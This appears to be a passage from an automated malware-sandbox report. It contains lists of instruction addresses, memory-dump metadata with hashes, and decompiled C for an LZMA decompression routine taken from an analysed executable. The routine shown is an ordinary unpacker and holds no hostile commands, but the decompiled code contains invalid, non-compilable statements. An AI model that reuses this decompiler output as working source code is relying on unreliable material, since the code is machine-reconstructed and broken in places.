                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00000000
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00406a5a
                                                  0x00406a60
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00406999
                                                  0x00000000
                                                  0x0040680e

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                  • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                                  • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                  • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
